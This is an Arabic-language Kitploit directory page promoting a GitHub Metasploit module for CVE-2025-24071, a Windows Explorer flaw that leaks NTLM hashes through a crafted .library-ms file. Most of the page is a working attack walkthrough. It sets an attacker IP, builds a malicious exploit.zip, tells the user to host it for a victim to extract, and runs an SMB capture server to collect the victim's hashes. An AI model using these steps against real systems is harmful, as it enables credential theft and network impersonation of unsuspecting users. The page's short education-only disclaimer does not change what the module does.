Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Blackash-CVE-2025-24071 — CVE-2025-24071 | Kitploit
أدوات/GitHubGitHub/zbs54/blackash-cve-2025-24071
أطر الاستغلالتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتاختبار الاختراق
GitHubzbs54/blackash-cve-2025-24071

Blackash-CVE-2025-24071

CVE-2025-24071

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Blackash-CVE-2025-24071

CVE-2025-24071: تسريب هاش NTLM عبر ملف .library-ms، وحدة Metasploit 🚨

الوصف

يعرض تسريب معلومات حساسة لجهة غير مصرح بها في مستكشف ملفات Windows يسمح لمهاجم غير مصرح به بتنفيذ انتحال عبر الشبكة.

القياسات

CNA: Microsoft Corporation النتيجة الأساسية: 6.5 متوسطة 🟠 المتجه: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

نظرة عامة

تحدث الثغرة عندما يقوم المستخدم باستخراج أرشيف ZIP يحتوي على ملف .library-ms مصمم خصيصًا. يبدأ مستكشف Windows تلقائيًا طلب مصادقة SMB إلى خادم بعيد محدد في الملف، مما يؤدي إلى تسريب هاش NTLM الخاص بالمستخدم دون أي تفاعل من المستخدم.

تقوم وحدة Metasploit هذه بما يلي:

  1. إنشاء ملف .library-ms خبيث.
  2. تعبئته في أرشيف ZIP.
  3. التكامل مع وظيفة التقاط SMB في Metasploit لجمع هاشات NTLM.
root@kitploit:~
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        https://metasploit.com


       =[ metasploit v6.4.64-dev                          ]
+ -- --=[ 2519 exploits - 1296 auxiliary - 431 post       ]
+ -- --=[ 1616 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use auxiliary/server/ntlm_hash_leak
msf6 auxiliary(server/ntlm_hash_leak) > set ATTACKER_IP 192.168.1.1
ATTACKER_IP => 192.168.1.1
msf6 auxiliary(server/ntlm_hash_leak) > set FILNAME exploit.zip
FILNAME => exploit.zip
msf6 auxiliary(server/ntlm_hash_leak) > set LIBRARY_NAME malicious.library-ms
LIBRARY_NAME => malicious.library-ms
msf6 auxiliary(server/ntlm_hash_leak) > set SHARE_NAME shared
set SHARE_NAME => shared
msf6 auxiliary(server/ntlm_hash_leak) > run
[*] Malicious ZIP file created: exploit.zip
[*] Host the file and wait for the victim to extract it.
[*] Ensure you have an SMB capture server running to collect NTLM hashes.
[*] Auxiliary module execution completed

التثبيت:

  1. استنساخ المستودع:
root@kitploit:~
git clone https://github.com/B1ack4sh/Blackash-CVE-2025-24071.git
cd CVE-2025-24071

الاستخدام:

  1. تحميل الوحدة:
root@kitploit:~
use auxiliary/server/ntlm_hash_leak
  1. تعيين الخيارات المطلوبة:
root@kitploit:~
set ATTACKER_IP 192.168.1.162           # Replace with your IP address
set FILENAME exploit.zip                # Name of the malicious ZIP file
set LIBRARY_NAME malicious.library-ms   # Name of the .library-ms file
set SHARE_NAME shared                   # SMB share name
  1. تشغيل الوحدة:
root@kitploit:~
run
  1. ستقوم الوحدة بإنشاء ملف ZIP خبيث (exploit.zip). استضف هذا الملف ليتمكن الضحية من تنزيله واستخراجه.
  2. استخدم وحدة التقاط SMB في Metasploit لجمع هاشات NTLM:
root@kitploit:~
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
run

إخلاء مسؤولية ⚠️

لأغراض تعليمية وبحثية فقط. استخدمها فقط ضد الأنظمة التي تملكها أو لديك إذن لاختبارها.

تنزيل الأداة